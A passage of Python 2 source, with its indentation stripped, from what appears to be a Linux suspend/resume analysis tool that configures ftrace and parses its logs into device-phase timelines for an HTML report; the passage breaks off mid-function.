def addIntraDevTraceEvent(self, action, name, pid, time):
if(action == 'mutex_lock_try'):
color = 'red'
elif(action == 'mutex_lock_pass'):
color = 'green'
elif(action == 'mutex_unlock'):
color = 'blue'
else:
# create separate colors based on the name
v1 = len(name)*10 % 256
v2 = string.count(name, 'e')*100 % 256
v3 = ord(name[0])*20 % 256
color = '#%06X' % ((v1*0x10000) + (v2*0x100) + v3)
for phase in self.phases:
list = self.dmesg[phase]['list']
for dev in list:
d = list[dev]
if(d['pid'] == pid and time >= d['start'] and
time <= d['end']):
e = TraceEvent(action, name, color, time)
if('traceevents' not in d):
d['traceevents'] = []
d['traceevents'].append(e)
return d
break
return 0
def capIntraDevTraceEvent(self, action, name, pid, time):
for phase in self.phases:
list = self.dmesg[phase]['list']
for dev in list:
d = list[dev]
if(d['pid'] == pid and time >= d['start'] and
time <= d['end']):
if('traceevents' not in d):
return
for e in d['traceevents']:
if(e.action == action and
e.name == name and not e.ready):
e.length = time - e.time
e.ready = True
break
return
def trimTimeVal(self, t, t0, dT, left):
if left:
if(t > t0):
if(t - dT < t0):
return t0
return t - dT
else:
return t
else:
if(t < t0 + dT):
if(t > t0):
return t0 + dT
return t + dT
else:
return t
def trimTime(self, t0, dT, left):
self.tSuspended = self.trimTimeVal(self.tSuspended, t0, dT, left)
self.tResumed = self.trimTimeVal(self.tResumed, t0, dT, left)
self.start = self.trimTimeVal(self.start, t0, dT, left)
self.end = self.trimTimeVal(self.end, t0, dT, left)
for phase in self.phases:
p = self.dmesg[phase]
p['start'] = self.trimTimeVal(p['start'], t0, dT, left)
p['end'] = self.trimTimeVal(p['end'], t0, dT, left)
list = p['list']
for name in list:
d = list[name]
d['start'] = self.trimTimeVal(d['start'], t0, dT, left)
d['end'] = self.trimTimeVal(d['end'], t0, dT, left)
if('ftrace' in d):
cg = d['ftrace']
cg.start = self.trimTimeVal(cg.start, t0, dT, left)
cg.end = self.trimTimeVal(cg.end, t0, dT, left)
for line in cg.list:
line.time = self.trimTimeVal(line.time, t0, dT, left)
if('traceevents' in d):
for e in d['traceevents']:
e.time = self.trimTimeVal(e.time, t0, dT, left)
def normalizeTime(self, tZero):
# first trim out any standby or freeze clock time
if(self.tSuspended != self.tResumed):
if(self.tResumed > tZero):
self.trimTime(self.tSuspended, \
self.tResumed-self.tSuspended, True)
else:
self.trimTime(self.tSuspended, \
self.tResumed-self.tSuspended, False)
# shift the timeline so that tZero is the new 0
self.tSuspended -= tZero
self.tResumed -= tZero
self.start -= tZero
self.end -= tZero
for phase in self.phases:
p = self.dmesg[phase]
p['start'] -= tZero
p['end'] -= tZero
list = p['list']
for name in list:
d = list[name]
d['start'] -= tZero
d['end'] -= tZero
if('ftrace' in d):
cg = d['ftrace']
cg.start -= tZero
cg.end -= tZero
for line in cg.list:
line.time -= tZero
if('traceevents' in d):
for e in d['traceevents']:
e.time -= tZero
def newPhaseWithSingleAction(self, phasename, devname, start, end, color):
for phase in self.phases:
self.dmesg[phase]['order'] += 1
self.html_device_id += 1
devid = '%s%d' % (self.idstr, self.html_device_id)
list = dict()
list[devname] = \
{'start': start, 'end': end, 'pid': 0, 'par': '',
'length': (end-start), 'row': 0, 'id': devid, 'drv': '' };
self.dmesg[phasename] = \
{'list': list, 'start': start, 'end': end,
'row': 0, 'color': color, 'order': 0}
self.phases = self.sortedPhases()
def newPhase(self, phasename, start, end, color, order):
if(order < 0):
order = len(self.phases)
for phase in self.phases[order:]:
self.dmesg[phase]['order'] += 1
if(order > 0):
p = self.phases[order-1]
self.dmesg[p]['end'] = start
if(order < len(self.phases)):
p = self.phases[order]
self.dmesg[p]['start'] = end
list = dict()
self.dmesg[phasename] = \
{'list': list, 'start': start, 'end': end,
'row': 0, 'color': color, 'order': order}
self.phases = self.sortedPhases()
def setPhase(self, phase, ktime, isbegin):
if(isbegin):
self.dmesg[phase]['start'] = ktime
else:
self.dmesg[phase]['end'] = ktime
def dmesgSortVal(self, phase):
return self.dmesg[phase]['order']
def sortedPhases(self):
return sorted(self.dmesg, key=self.dmesgSortVal)
def sortedDevices(self, phase):
list = self.dmesg[phase]['list']
slist = []
tmp = dict()
for devname in list:
dev = list[devname]
tmp[dev['start']] = devname
for t in sorted(tmp):
slist.append(tmp[t])
return slist
def fixupInitcalls(self, phase, end):
# if any calls never returned, clip them at system resume end
phaselist = self.dmesg[phase]['list']
for devname in phaselist:
dev = phaselist[devname]
if(dev['end'] < 0):
dev['end'] = end
vprint('%s (%s): callback didnt return' % (devname, phase))
def deviceFilter(self, devicefilter):
# remove all by the relatives of the filter devnames
filter = []
for phase in self.phases:
list = self.dmesg[phase]['list']
for name in devicefilter:
dev = name
while(dev in list):
if(dev not in filter):
filter.append(dev)
dev = list[dev]['par']
children = self.deviceDescendants(name, phase)
for dev in children:
if(dev not in filter):
filter.append(dev)
for phase in self.phases:
list = self.dmesg[phase]['list']
rmlist = []
for name in list:
pid = list[name]['pid']
if(name not in filter and pid >= 0):
rmlist.append(name)
for name in rmlist:
del list[name]
def fixupInitcallsThatDidntReturn(self):
# if any calls never returned, clip them at system resume end
for phase in self.phases:
self.fixupInitcalls(phase, self.getEnd())
def newActionGlobal(self, name, start, end):
# which phase is this device callback or action "in"
targetphase = "none"
overlap = 0.0
for phase in self.phases:
pstart = self.dmesg[phase]['start']
pend = self.dmesg[phase]['end']
o = max(0, min(end, pend) - max(start, pstart))
if(o > overlap):
targetphase = phase
overlap = o
if targetphase in self.phases:
self.newAction(targetphase, name, -1, '', start, end, '')
return True
return False
def newAction(self, phase, name, pid, parent, start, end, drv):
# new device callback for a specific phase
self.html_device_id += 1
devid = '%s%d' % (self.idstr, self.html_device_id)
list = self.dmesg[phase]['list']
length = -1.0
if(start >= 0 and end >= 0):
length = end - start
list[name] = {'start': start, 'end': end, 'pid': pid, 'par': parent,
'length': length, 'row': 0, 'id': devid, 'drv': drv }
def deviceIDs(self, devlist, phase):
idlist = []
list = self.dmesg[phase]['list']
for devname in list:
if devname in devlist:
idlist.append(list[devname]['id'])
return idlist
def deviceParentID(self, devname, phase):
pdev = ''
pdevid = ''
list = self.dmesg[phase]['list']
if devname in list:
pdev = list[devname]['par']
if pdev in list:
return list[pdev]['id']
return pdev
def deviceChildren(self, devname, phase):
devlist = []
list = self.dmesg[phase]['list']
for child in list:
if(list[child]['par'] == devname):
devlist.append(child)
return devlist
def deviceDescendants(self, devname, phase):
children = self.deviceChildren(devname, phase)
family = children
for child in children:
family += self.deviceDescendants(child, phase)
return family
def deviceChildrenIDs(self, devname, phase):
devlist = self.deviceChildren(devname, phase)
return self.deviceIDs(devlist, phase)
def printDetails(self):
vprint(' test start: %f' % self.start)
for phase in self.phases:
dc = len(self.dmesg[phase]['list'])
vprint(' %16s: %f - %f (%d devices)' % (phase, \
self.dmesg[phase]['start'], self.dmesg[phase]['end'], dc))
vprint(' test end: %f' % self.end)
def masterTopology(self, name, list, depth):
node = DeviceNode(name, depth)
for cname in list:
clist = self.deviceChildren(cname, 'resume')
cnode = self.masterTopology(cname, clist, depth+1)
node.children.append(cnode)
return node
def printTopology(self, node):
html = ''
if node.name:
info = ''
drv = ''
for phase in self.phases:
list = self.dmesg[phase]['list']
if node.name in list:
s = list[node.name]['start']
e = list[node.name]['end']
if list[node.name]['drv']:
drv = ' {'+list[node.name]['drv']+'}'
info += ('<li>%s: %.3fms</li>' % (phase, (e-s)*1000))
html += '<li><b>'+node.name+drv+'</b>'
if info:
html += '<ul>'+info+'</ul>'
html += '</li>'
if len(node.children) > 0:
html += '<ul>'
for cnode in node.children:
html += self.printTopology(cnode)
html += '</ul>'
return html
def rootDeviceList(self):
# list of devices graphed
real = []
for phase in self.dmesg:
list = self.dmesg[phase]['list']
for dev in list:
if list[dev]['pid'] >= 0 and dev not in real:
real.append(dev)
# list of top-most root devices
rootlist = []
for phase in self.dmesg:
list = self.dmesg[phase]['list']
for dev in list:
pdev = list[dev]['par']
if(re.match('[0-9]*-[0-9]*\.[0-9]*[\.0-9]*\:[\.0-9]*$', pdev)):
continue
if pdev and pdev not in real and pdev not in rootlist:
rootlist.append(pdev)
return rootlist
def deviceTopology(self):
rootlist = self.rootDeviceList()
master = self.masterTopology('', rootlist, 0)
return self.printTopology(master)
# Class: TraceEvent
# Description:
# A container for trace event data found in the ftrace file
class TraceEvent:
ready = False
name = ''
time = 0.0
color = '#FFFFFF'
length = 0.0
action = ''
def __init__(self, a, n, c, t):
self.action = a
self.name = n
self.color = c
self.time = t
# Class: FTraceLine
# Description:
# A container for a single line of ftrace data. There are six basic types:
# callgraph line:
# call: " dpm_run_callback() {"
# return: " }"
# leaf: " dpm_run_callback();"
# trace event:
# tracing_mark_write: SUSPEND START or RESUME COMPLETE
# suspend_resume: phase or custom exec block data
# device_pm_callback: device callback info
class FTraceLine:
time = 0.0
length = 0.0
fcall = False
freturn = False
fevent = False
depth = 0
name = ''
type = ''
def __init__(self, t, m, d):
self.time = float(t)
# is this a trace event
if(d == 'traceevent' or re.match('^ *\/\* *(?P<msg>.*) \*\/ *$', m)):
if(d == 'traceevent'):
# nop format trace event
msg = m
else:
# function_graph format trace event
em = re.match('^ *\/\* *(?P<msg>.*) \*\/ *$', m)
msg = em.group('msg')
emm = re.match('^(?P<call>.*?): (?P<msg>.*)', msg)
if(emm):
self.name = emm.group('msg')
self.type = emm.group('call')
else:
self.name = msg
self.fevent = True
return
# convert the duration to seconds
if(d):
self.length = float(d)/1000000
# the indentation determines the depth
match = re.match('^(?P<d> *)(?P<o>.*)$', m)
if(not match):
return
self.depth = self.getDepth(match.group('d'))
m = match.group('o')
# function return
if(m[0] == '}'):
self.freturn = True
if(len(m) > 1):
# includes comment with function name
match = re.match('^} *\/\* *(?P<n>.*) *\*\/$', m)
if(match):
self.name = match.group('n')
# function call
else:
self.fcall = True
# function call with children
if(m[-1] == '{'):
match = re.match('^(?P<n>.*) *\(.*', m)
if(match):
self.name = match.group('n')
# function call with no children (leaf)
elif(m[-1] == ';'):
self.freturn = True
match = re.match('^(?P<n>.*) *\(.*', m)
if(match):
self.name = match.group('n')
# something else (possibly a trace marker)
else:
self.name = m
def getDepth(self, str):
return len(str)/2
def debugPrint(self, dev):
if(self.freturn and self.fcall):
print('%s -- %f (%02d): %s(); (%.3f us)' % (dev, self.time, \
self.depth, self.name, self.length*1000000))
elif(self.freturn):
print('%s -- %f (%02d): %s} (%.3f us)' % (dev, self.time, \
self.depth, self.name, self.length*1000000))
else:
print('%s -- %f (%02d): %s() { (%.3f us)' % (dev, self.time, \
self.depth, self.name, self.length*1000000))
# Class: FTraceCallGraph
# Description:
# A container for the ftrace callgraph of a single recursive function.
# This can be a dpm_run_callback, dpm_prepare, or dpm_complete callgraph
# Each instance is tied to a single device in a single phase, and is
# comprised of an ordered list of FTraceLine objects
class FTraceCallGraph:
start = -1.0
end = -1.0
list = []
invalid = False
depth = 0
def __init__(self):
self.start = -1.0
self.end = -1.0
self.list = []
self.depth = 0
def setDepth(self, line):
if(line.fcall and not line.freturn):
line.depth = self.depth
self.depth += 1
elif(line.freturn and not line.fcall):
self.depth -= 1
line.depth = self.depth
else:
line.depth = self.depth
def addLine(self, line, match):
if(not self.invalid):
self.setDepth(line)
if(line.depth == 0 and line.freturn):
if(self.start < 0):
self.start = line.time
self.end = line.time
self.list.append(line)
return True
if(self.invalid):
return False
if(len(self.list) >= 1000000 or self.depth < 0):
if(len(self.list) > 0):
first = self.list[0]
self.list = []
self.list.append(first)
self.invalid = True
if(not match):
return False
id = 'task %s cpu %s' % (match.group('pid'), match.group('cpu'))
window = '(%f - %f)' % (self.start, line.time)
if(self.depth < 0):
print('Too much data for '+id+\
' (buffer overflow), ignoring this callback')
else:
print('Too much data for '+id+\
' '+window+', ignoring this callback')
return False
self.list.append(line)
if(self.start < 0):
self.start = line.time
return False
def slice(self, t0, tN):
minicg = FTraceCallGraph()
count = -1
firstdepth = 0
for l in self.list:
if(l.time < t0 or l.time > tN):
continue
if(count < 0):
if(not l.fcall or l.name == 'dev_driver_string'):
continue
firstdepth = l.depth
count = 0
l.depth -= firstdepth
minicg.addLine(l, 0)
if((count == 0 and l.freturn and l.fcall) or
(count > 0 and l.depth <= 0)):
break
count += 1
return minicg
def sanityCheck(self):
stack = dict()
cnt = 0
for l in self.list:
if(l.fcall and not l.freturn):
stack[l.depth] = l
cnt += 1
elif(l.freturn and not l.fcall):
if(l.depth not in stack):
return False
stack[l.depth].length = l.length
stack[l.depth] = 0
l.length = 0
cnt -= 1
if(cnt == 0):
return True
return False
def debugPrint(self, filename):
if(filename == 'stdout'):
print('[%f - %f]') % (self.start, self.end)
for l in self.list:
if(l.freturn and l.fcall):
print('%f (%02d): %s(); (%.3f us)' % (l.time, \
l.depth, l.name, l.length*1000000))
elif(l.freturn):
print('%f (%02d): %s} (%.3f us)' % (l.time, \
l.depth, l.name, l.length*1000000))
else:
print('%f (%02d): %s() { (%.3f us)' % (l.time, \
l.depth, l.name, l.length*1000000))
print(' ')
else:
fp = open(filename, 'w')
print(filename)
for l in self.list:
if(l.freturn and l.fcall):
fp.write('%f (%02d): %s(); (%.3f us)\n' % (l.time, \
l.depth, l.name, l.length*1000000))
elif(l.freturn):
fp.write('%f (%02d): %s} (%.3f us)\n' % (l.time, \
l.depth, l.name, l.length*1000000))
else:
fp.write('%f (%02d): %s() { (%.3f us)\n' % (l.time, \
l.depth, l.name, l.length*1000000))
fp.close()
# Class: Timeline
# Description:
# A container for a suspend/resume html timeline. In older versions
# of the script there were multiple timelines, but in the latest
# there is only one.
class Timeline:
html = {}
scaleH = 0.0 # height of the row as a percent of the timeline height
rowH = 0.0 # height of each row in percent of the timeline height
row_height_pixels = 30
maxrows = 0
height = 0
def __init__(self):
self.html = {
'timeline': '',
'legend': '',
'scale': ''
}
def setRows(self, rows):
self.maxrows = int(rows)
self.scaleH = 100.0/float(self.maxrows)
self.height = self.maxrows*self.row_height_pixels
r = float(self.maxrows - 1)
if(r < 1.0):
r = 1.0
self.rowH = (100.0 - self.scaleH)/r
# Class: TestRun
# Description:
# A container for a suspend/resume test run. This is necessary as
# there could be more than one, and they need to be separate.
class TestRun:
ftrace_line_fmt_fg = \
'^ *(?P<time>[0-9\.]*) *\| *(?P<cpu>[0-9]*)\)'+\
' *(?P<proc>.*)-(?P<pid>[0-9]*) *\|'+\
'[ +!]*(?P<dur>[0-9\.]*) .*\| (?P<msg>.*)'
ftrace_line_fmt_nop = \
' *(?P<proc>.*)-(?P<pid>[0-9]*) *\[(?P<cpu>[0-9]*)\] *'+\
'(?P<flags>.{4}) *(?P<time>[0-9\.]*): *'+\
'(?P<msg>.*)'
ftrace_line_fmt = ftrace_line_fmt_nop
cgformat = False
ftemp = dict()
ttemp = dict()
inthepipe = False
tracertype = ''
data = 0
def __init__(self, dataobj):
self.data = dataobj
self.ftemp = dict()
self.ttemp = dict()
def isReady(self):
if(tracertype == '' or not data):
return False
return True
def setTracerType(self, tracer):
self.tracertype = tracer
if(tracer == 'function_graph'):
self.cgformat = True
self.ftrace_line_fmt = self.ftrace_line_fmt_fg
elif(tracer == 'nop'):
self.ftrace_line_fmt = self.ftrace_line_fmt_nop
else:
doError('Invalid tracer format: [%s]' % tracer, False)
# ----------------- FUNCTIONS --------------------
# Function: vprint
# Description:
# verbose print (prints only with -verbose option)
# Arguments:
# msg: the debug/log message to print
def vprint(msg):
global sysvals
if(sysvals.verbose):
print(msg)
# Function: initFtrace
# Description:
# Configure ftrace to use trace events and/or a callgraph
def initFtrace():
global sysvals
tp = sysvals.tpath
cf = 'dpm_run_callback'
if(sysvals.usetraceeventsonly):
cf = '-e dpm_prepare -e dpm_complete -e dpm_run_callback'
if(sysvals.usecallgraph or sysvals.usetraceevents):
print('INITIALIZING FTRACE...')
# turn trace off
os.system('echo 0 > '+tp+'tracing_on')
# set the trace clock to global
os.system('echo global > '+tp+'trace_clock')
# set trace buffer to a huge value
os.system('echo nop > '+tp+'current_tracer')
os.system('echo 100000 > '+tp+'buffer_size_kb')
# initialize the callgraph trace, unless this is an x2 run
if(sysvals.usecallgraph and sysvals.execcount == 1):
# set trace type
os.system('echo function_graph > '+tp+'current_tracer')
os.system('echo "" > '+tp+'set_ftrace_filter')
# set trace format options
os.system('echo funcgraph-abstime > '+tp+'trace_options')
os.system('echo funcgraph-proc > '+tp+'trace_options')
# focus only on device suspend and resume
os.system('cat '+tp+'available_filter_functions | grep '+\
cf+' > '+tp+'set_graph_function')
if(sysvals.usetraceevents):
# turn trace events on
events = iter(sysvals.traceevents)
for e in events:
os.system('echo 1 > '+sysvals.epath+e+'/enable')
# clear the trace buffer
os.system('echo "" > '+tp+'trace')
# Function: initFtraceAndroid
# Description:
# Configure ftrace to capture trace events
def initFtraceAndroid():
global sysvals
tp = sysvals.tpath
if(sysvals.usetraceevents):
print('INITIALIZING FTRACE...')
# turn trace off
os.system(sysvals.adb+" shell 'echo 0 > "+tp+"tracing_on'")
# set the trace clock to global
os.system(sysvals.adb+" shell 'echo global > "+tp+"trace_clock'")
# set trace buffer to a huge value
os.system(sysvals.adb+" shell 'echo nop > "+tp+"current_tracer'")
os.system(sysvals.adb+" shell 'echo 10000 > "+tp+"buffer_size_kb'")
# turn trace events on
events = iter(sysvals.traceevents)
for e in events:
os.system(sysvals.adb+" shell 'echo 1 > "+\
sysvals.epath+e+"/enable'")
# clear the trace buffer
os.system(sysvals.adb+" shell 'echo \"\" > "+tp+"trace'")
# Function: verifyFtrace
# Description:
# Check that ftrace is working on the system
# Output:
# True or False
def verifyFtrace():
global sysvals
# files needed for any trace data
files = ['buffer_size_kb', 'current_tracer', 'trace', 'trace_clock',
'trace_marker', 'trace_options', 'tracing_on']
# files needed for callgraph trace data
tp = sysvals.tpath
if(sysvals.usecallgraph):
files += [
'available_filter_functions',
'set_ftrace_filter',
'set_graph_function'
]
for f in files:
if(sysvals.android):
out = os.popen(sysvals.adb+' shell ls '+tp+f).read().strip()
if(out != tp+f):
return False
else:
if(os.path.exists(tp+f) == False):
return False
return True
# Function: parseStamp
# Description:
# Pull in the stamp comment line from the data file(s),
# create the stamp, and add it to the global sysvals object
# Arguments:
# m: the valid re.match output for the stamp line
def parseStamp(m, data):
global sysvals
data.stamp = {'time': '', 'host': '', 'mode': ''}
dt = datetime(int(m.group('y'))+2000, int(m.group('m')),
int(m.group('d')), int(m.group('H')), int(m.group('M')),
int(m.group('S')))
data.stamp['time'] = dt.strftime('%B %d %Y, %I:%M:%S %p')
data.stamp['host'] = m.group('host')
data.stamp['mode'] = m.group('mode')
data.stamp['kernel'] = m.group('kernel')
sysvals.suspendmode = data.stamp['mode']
if not sysvals.stamp:
sysvals.stamp = data.stamp
# Function: diffStamp
# Description:
# compare the host, kernel, and mode fields in 3 stamps
# Arguments:
# stamp1: string array with mode, kernel, and host
# stamp2: string array with mode, kernel, and host
# Return:
# True if stamps differ, False if they're the same
def diffStamp(stamp1, stamp2):
if 'host' in stamp1 and 'host' in stamp2:
if stamp1['host'] != stamp2['host']:
return True
if 'kernel' in stamp1 and 'kernel' in stamp2:
if stamp1['kernel'] != stamp2['kernel']:
return True
if 'mode' in stamp1 and 'mode' in stamp2:
if stamp1['mode'] != stamp2['mode']:
return True
return False
# Function: doesTraceLogHaveTraceEvents
# Description:
# Quickly determine if the ftrace log has some or all of the trace events
# required for primary parsing. Set the usetraceevents and/or
# usetraceeventsonly flags in the global sysvals object
def doesTraceLogHaveTraceEvents():
global sysvals
sysvals.usetraceeventsonly = True
sysvals.usetraceevents = False
for e in sysvals.traceevents:
out = os.popen('cat '+sysvals.ftracefile+' | grep "'+e+': "').read()
if(not out):
sysvals.usetraceeventsonly = False
if(e == 'suspend_resume' and out):
sysvals.usetraceevents = True
# Function: appendIncompleteTraceLog
# Description:
# [deprecated for kernel 3.15 or newer]
# Legacy support of ftrace outputs that lack the device_pm_callback
# and/or suspend_resume trace events. The primary data should be
# taken from dmesg, and this ftrace is used only for callgraph data
# or custom actions in the timeline. The data is appended to the Data
# objects provided.
# Arguments:
# testruns: the array of Data objects obtained from parseKernelLog
def appendIncompleteTraceLog(testruns):
global sysvals
# create TestRun vessels for ftrace parsing
testcnt = len(testruns)
testidx = -1
testrun = []
for data in testruns:
testrun.append(TestRun(data))
# extract the callgraph and traceevent data
vprint('Analyzing the ftrace data...')
tf = open(sysvals.ftracefile, 'r')
for line in tf:
# remove any latent carriage returns
line = line.replace('\r\n', '')
# grab the time stamp first (signifies the start of the test run)
m = re.match(sysvals.stampfmt, line)
if(m):
testidx += 1
parseStamp(m, testrun[testidx].data)
continue
# pull out any firmware data
if(re.match(sysvals.firmwarefmt, line)):
continue
# if we havent found a test time stamp yet keep spinning til we do
if(testidx < 0):
continue
# determine the trace data type (required for further parsing)
m = re.match(sysvals.tracertypefmt, line)
if(m):
tracer = m.group('t')
testrun[testidx].setTracerType(tracer)
continue
# parse only valid lines, if this isnt one move on
m = re.match(testrun[testidx].ftrace_line_fmt, line)
if(not m):
continue
# gather the basic message data from the line
m_time = m.group('time')
m_pid = m.group('pid')
m_msg = m.group('msg')
if(testrun[testidx].cgformat):
m_param3 = m.group('dur')
else:
m_param3 = 'traceevent'
if(m_time and m_pid and m_msg):
t = FTraceLine(m_time, m_msg, m_param3)
pid = int(m_pid)
else:
continue
# the line should be a call, return, or event
if(not t.fcall and not t.freturn and not t.fevent):
continue
# only parse the ftrace data during suspend/resume
data = testrun[testidx].data
if(not testrun[testidx].inthepipe):
# look for the suspend start marker
if(t.fevent):
if(t.name == 'SUSPEND START'):
testrun[testidx].inthepipe = True
data.setStart(t.time)
continue
else:
# trace event processing
if(t.fevent):
if(t.name == 'RESUME COMPLETE'):
testrun[testidx].inthepipe = False
data.setEnd(t.time)
if(testidx == testcnt - 1):
break
continue
# general trace events have two types, begin and end
if(re.match('(?P<name>.*) begin$', t.name)):
isbegin = True
elif(re.match('(?P<name>.*) end$', t.name)):
isbegin = False
else:
continue
m = re.match('(?P<name>.*)\[(?P<val>[0-9]*)\] .*', t.name)
if(m):
val = m.group('val')
if val == '0':
name = m.group('name')
else:
name = m.group('name')+'['+val+']'
else:
m = re.match('(?P<name>.*) .*', t.name)
name = m.group('name')
# special processing for trace events
if re.match('dpm_prepare\[.*', name):
continue
elif re.match('machine_suspend.*', name):
continue
elif re.match('suspend_enter\[.*', name):
if(not isbegin):
data.dmesg['suspend_prepare']['end'] = t.time
continue
elif re.match('dpm_suspend\[.*', name):
if(not isbegin):
data.dmesg['suspend']['end'] = t.time
continue
elif re.match('dpm_suspend_late\[.*', name):
if(isbegin):
data.dmesg['suspend_late']['start'] = t.time
else:
data.dmesg['suspend_late']['end'] = t.time
continue
elif re.match('dpm_suspend_noirq\[.*', name):
if(isbegin):
data.dmesg['suspend_noirq']['start'] = t.time
else:
data.dmesg['suspend_noirq']['end'] = t.time
continue
elif re.match('dpm_resume_noirq\[.*', name):
if(isbegin):
data.dmesg['resume_machine']['end'] = t.time
data.dmesg['resume_noirq']['start'] = t.time
else:
data.dmesg['resume_noirq']['end'] = t.time
continue
elif re.match('dpm_resume_early\[.*', name):
if(isbegin):
data.dmesg['resume_early']['start'] = t.time
else:
data.dmesg['resume_early']['end'] = t.time
continue
elif re.match('dpm_resume\[.*', name):
if(isbegin):
data.dmesg['resume']['start'] = t.time
else:
data.dmesg['resume']['end'] = t.time
continue
elif re.match('dpm_complete\[.*', name):
if(isbegin):
data.dmesg['resume_complete']['start'] = t.time
else:
data.dmesg['resume_complete']['end'] = t.time
continue
# is this trace event outside of the devices calls
if(data.isTraceEventOutsideDeviceCalls(pid, t.time)):
# global events (outside device calls) are simply graphed
if(isbegin):
# store each trace event in ttemp
if(name not in testrun[testidx].ttemp):
testrun[testidx].ttemp[name] = []
testrun[testidx].ttemp[name].append(\
{'begin': t.time, 'end': t.time})
else:
# finish off matching trace event in ttemp
if(name in testrun[testidx].ttemp):
testrun[testidx].ttemp[name][-1]['end'] = t.time
else:
if(isbegin):
data.addIntraDevTraceEvent('', name, pid, t.time)
else:
data.capIntraDevTraceEvent('', name, pid, t.time)
# call/return processing
elif sysvals.usecallgraph:
# create a callgraph object for the data
if(pid not in testrun[testidx].ftemp):
testrun[testidx].ftemp[pid] = []
testrun[testidx].ftemp[pid].append(FTraceCallGraph())
# when the call is finished, see which device matches it
cg = testrun[testidx].ftemp[pid][-1]
if(cg.addLine(t, m)):
testrun[testidx].ftemp[pid].append(FTraceCallGraph())
tf.close()
for test in testrun:
# add the traceevent data to the device hierarchy
if(sysvals.usetraceevents):
for name in test.ttemp:
for event in test.ttemp[name]:
begin = event['begin']
end = event['end']
# if event starts before timeline start, expand timeline
if(begin < test.data.start):
test.data.setStart(begin)
# if event ends after timeline end, expand the timeline
if(end > test.data.end):
test.data.setEnd(end)
test.data.newActionGlobal(name, begin, end)
# add the callgraph data to the device hierarchy
for pid in test.ftemp:
for cg in test.ftemp[pid]:
if(not cg.sanityCheck()):
id = 'task %s cpu %s' % (pid, m.group('cpu'))
vprint('Sanity check failed for '+\
id+', ignoring this callback')
continue
callstart = cg.start
callend = cg.end
for p in test.data.phases:
if(test.data.dmesg[p]['start'] <= callstart and
callstart <= test.data.dmesg[p]['end']):
list = test.data.dmesg[p]['list']
for devname in list:
dev = list[devname]
if(pid == dev['pid'] and
callstart <= dev['start'] and
callend >= dev['end']):
dev['ftrace'] = cg
break
if(sysvals.verbose):
test.data.printDetails()
# add the time in between the tests as a new phase so we can see it
if(len(testruns) > 1):
t1e = testruns[0].getEnd()
t2s = testruns[-1].getStart()
testruns[-1].newPhaseWithSingleAction('user mode', \
'user mode', t1e, t2s, '#FF9966')
# Function: parseTraceLog
# Description:
# Analyze an ftrace log output file generated from this app during
# the execution phase. Used when the ftrace log is the primary data source
# and includes the suspend_resume and device_pm_callback trace events
# The ftrace filename is taken from sysvals
# Output:
# An array of Data objects
def parseTraceLog():
global sysvals
vprint('Analyzing the ftrace data...')
if(os.path.exists(sysvals.ftracefile) == False):
doError('%s doesnt exist' % sysvals.ftracefile, False)
# extract the callgraph and traceevent data
testruns = []
testdata = []
testrun = 0
data = 0
tf = open(sysvals.ftracefile, 'r')
phase = 'suspend_prepare'
for line in tf:
# remove any latent carriage returns
line = line.replace('\r\n', '')
# stamp line: each stamp means a new test run
m = re.match(sysvals.stampfmt, line)
if(m):
data = Data(len(testdata))
testdata.append(data)
testrun = TestRun(data)
testruns.append(testrun)
parseStamp(m, data)
continue
if(not data):
continue
# firmware line: pull out any firmware data
m = re.match(sysvals.firmwarefmt, line)
if(m):
data.fwSuspend = int(m.group('s'))
data.fwResume = int(m.group('r'))
if(data.fwSuspend > 0 or data.fwResume > 0):
data.fwValid = True
continue
# tracer type line: determine the trace data type
m = re.match(sysvals.tracertypefmt, line)
if(m):
tracer = m.group('t')
testrun.setTracerType(tracer)
continue
# post resume time line: did this test run include post-resume data
m = re.match(sysvals.postresumefmt, line)
if(m):
t = int(m.group('t'))
if(t > 0):
sysvals.postresumetime = t
continue
# ftrace line: parse only valid lines
m = re.match(testrun.ftrace_line_fmt, line)
if(not m):
continue
# gather the basic message data from the line
m_time = m.group('time')
m_pid = m.group('pid')
m_msg = m.group('msg')
if(testrun.cgformat):
m_param3 = m.group('dur')
else:
m_param3 = 'traceevent'
if(m_time and m_pid and m_msg):
t = FTraceLine(m_time, m_msg, m_param3)
pid = int(m_pid)
else:
continue
# the line should be a call, return, or event
if(not t.fcall and not t.freturn and not t.fevent):
continue
# only parse the ftrace data during suspend/resume
if(not testrun.inthepipe):
# look for the suspend start marker
if(t.fevent):
if(t.name == 'SUSPEND START'):
testrun.inthepipe = True
data.setStart(t.time)
continue
# trace event processing
if(t.fevent):
if(t.name == 'RESUME COMPLETE'):
if(sysvals.postresumetime > 0):
phase = 'post_resume'
data.newPhase(phase, t.time, t.time, '#FF9966', -1)
else:
testrun.inthepipe = False
data.setEnd(t.time)
continue
if(phase == 'post_resume'):
data.setEnd(t.time)
if(t.type == 'suspend_resume'):
# suspend_resume trace events have two types, begin and end
if(re.match('(?P<name>.*) begin$', t.name)):
isbegin = True
elif(re.match('(?P<name>.*) end$', t.name)):
isbegin = False
else:
continue
m = re.match('(?P<name>.*)\[(?P<val>[0-9]*)\] .*', t.name)
if(m):
val = m.group('val')
if val == '0':
name = m.group('name')
else:
name = m.group('name')+'['+val+']'
else:
m = re.match('(?P<name>.*) .*', t.name)
name = m.group('name')
# ignore these events
if(re.match('acpi_suspend\[.*', t.name) or
re.match('suspend_enter\[.*', name)):
continue
# -- phase changes --
# suspend_prepare start
if(re.match('dpm_prepare\[.*', t.name)):
phase = 'suspend_prepare'
if(not isbegin):
data.dmesg[phase]['end'] = t.time
continue
# suspend start
elif(re.match('dpm_suspend\[.*', t.name)):
phase = 'suspend'
data.setPhase(phase, t.time, isbegin)
continue
# suspend_late start
elif(re.match('dpm_suspend_late\[.*', t.name)):
phase = 'suspend_late'
data.setPhase(phase, t.time, isbegin)
continue
# suspend_noirq start
elif(re.match('dpm_suspend_noirq\[.*', t.name)):
phase = 'suspend_noirq'
data.setPhase(phase, t.time, isbegin)
if(not isbegin):
phase = 'suspend_machine'
data.dmesg[phase]['start'] = t.time
continue
# suspend_machine/resume_machine
elif(re.match('machine_suspend\[.*', t.name)):
if(isbegin):
phase = 'suspend_machine'
data.dmesg[phase]['end'] = t.time
data.tSuspended = t.time
else:
if(sysvals.suspendmode in ['mem', 'disk']):
data.dmesg['suspend_machine']['end'] = t.time
data.tSuspended = t.time
phase = 'resume_machine'
data.dmesg[phase]['start'] = t.time
data.tResumed = t.time
data.tLow = data.tResumed - data.tSuspended
continue
# resume_noirq start
elif(re.match('dpm_resume_noirq\[.*', t.name)):
phase = 'resume_noirq'
data.setPhase(phase, t.time, isbegin)
if(isbegin):
